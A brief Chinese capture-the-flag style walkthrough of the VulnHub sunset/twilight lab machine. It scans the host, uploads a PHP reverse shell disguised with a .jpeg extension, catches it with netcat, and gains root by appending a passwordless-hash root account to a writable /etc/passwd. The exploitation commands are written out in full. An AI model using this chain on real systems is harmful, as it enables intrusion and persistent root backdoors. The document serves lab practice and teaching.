今天实践的是vulnhub的sunset/twilight镜像,
下载地址,https://download.vulnhub.com/sunset/twilight.7z,
先是用workstation导入,做地址扫描没扫到地址,
于是又用virtualbox导入,重新做地址扫描,
sudo netdiscover -r 192.168.0.0/24,这回有地址了,191就是,
再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.191,
有web服务,做一下目录暴破,dirb http://192.168.0.191,
浏览器访问http://192.168.0.191/gallery/index.php,
kali攻击机上准备web反弹shell文件,
cp /usr/share/webshells/php/php-reverse-shell.php shell.php,
改好反弹的地址和端口,并改扩展名,mv shell.php shell.php.jpeg,
用burp suite上传文件,并修改文件名,
上传成功,
kali攻击机上开个反弹shell监听,nc -lvp 4444,
浏览器访问http://192.168.0.191/gallery/original/shell.php,
反弹shell这就过来了,id确认不是root,需要提权,
查看到passwd文件是可写的,ls -l /etc/passwd,
向里面添加一个root权限的账号,
echo "hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash" >> /etc/passwd,
切换账号,su hacker,再id确认是root,
本期的实践比较简单,一般来说,普通账户不应该可写passwd文件。
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之sunset/twilight的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论